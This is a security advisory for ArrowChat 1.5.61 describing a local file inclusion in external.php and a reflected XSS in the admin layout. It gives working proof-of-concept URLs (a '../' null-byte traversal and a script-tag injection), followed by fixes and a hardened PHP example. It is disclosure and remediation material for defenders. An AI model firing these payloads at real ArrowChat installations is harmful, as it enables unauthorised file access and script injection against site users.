
ArrowChat 1.5.61 multiple vulnerabilities

2015-01-20 11:44 Source: Editor: admin
Title: ArrowChat <= 1.5.61 Multiple vulnerabilities
Author: Kallimero
Affected versions: 1.5.61, earlier, and maybe 1.6
Tested on: Debian

Description
============

ArrowChat is a chat script which can be integrated into various CMSs, such as WordPress, or some bulletin boards.

Vulnerability analysis
========

1- ) Local File Inclusion

external.php lets us load a language, but not in a secure way.

---------------[external.php]---------------

// Load another language if lang GET value is set and exists
if (var_check('lang')) {
    $lang = get_var('lang');

    if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php"))
    {
        include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php");
    }
}

---------------[index.php]---------------

Thanks to the null-byte trick we'll be able to include any PHP file, like this:

http://[site]/[path]/external.php?lang=../path/to/file%00&type=djs

2- ) Reflected XSS

The administration layout is accessible to anyone. Even if we can't execute the PHP code of the admin, we can inject HTML thanks to $_SERVER['PHP_SELF'].

Example:
-------[admin/layout/pages_general.php]-----

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php echo $do; ?>" enctype="multipart/form-data">

----------------------------------

PoC: http://[site]/[path]/admin/layout/pages_general.php/'"/><script>alert(1);</script>

How to Fix ?
============

To fix the LFI, you can replace the block with:

// Load another language if lang GET value is set and exists
if (var_check('lang')) {
    $lang = get_var('lang');

    if (preg_match("#^[a-z]{2,5}$#i", $lang)) {
        if (file_exists(dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php"))
        {
            include (dirname(__FILE__) . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . ".php");
        }
    }
}

lang will be included only if it names a valid language file.

For the XSS, you can use a .htaccess to protect the layout directory, and use htmlentities to avoid the HTML injection.
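Both fixes combined into a hardened loader and form action, as an added example rather than ArrowChat's own code; it assumes AC_FOLDER_LANGUAGE is the name of the language directory and adds a realpath() containment check on top of the allowlist pattern from the fix above.

```php
<?php
// Added example, not ArrowChat's code. AC_FOLDER_LANGUAGE is assumed to
// be the language directory name that external.php uses.
define('AC_FOLDER_LANGUAGE', 'lang');

// Returns the absolute path of the language file to include, or null if
// the requested language is not acceptable. Two independent checks:
// 1. the allowlist pattern from the fix (letters only, 2..5 characters),
//    which rejects "../", "%00" and anything that is not a language code
//    (recent PHP versions also refuse paths containing a null byte, but
//    the traversal itself still needs the allowlist);
// 2. a realpath() containment check, so that even a later relaxation of
//    the pattern cannot resolve to a file outside the language directory.
function language_file(string $lang): ?string
{
    if (!preg_match('#^[a-z]{2,5}$#i', $lang)) {
        return null;
    }
    $base = realpath(__DIR__ . DIRECTORY_SEPARATOR . AC_FOLDER_LANGUAGE);
    if ($base === false) {
        return null;
    }
    $file = realpath($base . DIRECTORY_SEPARATOR . $lang . DIRECTORY_SEPARATOR . $lang . '.php');
    if ($file === false) {
        return null;
    }
    // The resolved file must sit below the language directory.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Hardened form action for pages_general.php: PHP_SELF carries the
// request path (including PATH_INFO), so it is HTML-escaped with both
// quote types before being placed inside the action attribute.
function form_action(string $do): string
{
    $self = htmlspecialchars($_SERVER['PHP_SELF'] ?? '', ENT_QUOTES, 'UTF-8');
    $do   = htmlspecialchars($do, ENT_QUOTES, 'UTF-8');
    return $self . '?do=' . $do;
}

// Usage, mirroring external.php: include only a file that passed both checks.
if (isset($_GET['lang']) && ($file = language_file((string) $_GET['lang'])) !== null) {
    include $file;
}
```

With this loader, a request such as lang=../path/to/file%00 is rejected by the pattern before any filesystem call is made, and the escaped form action renders a crafted path segment as inert text.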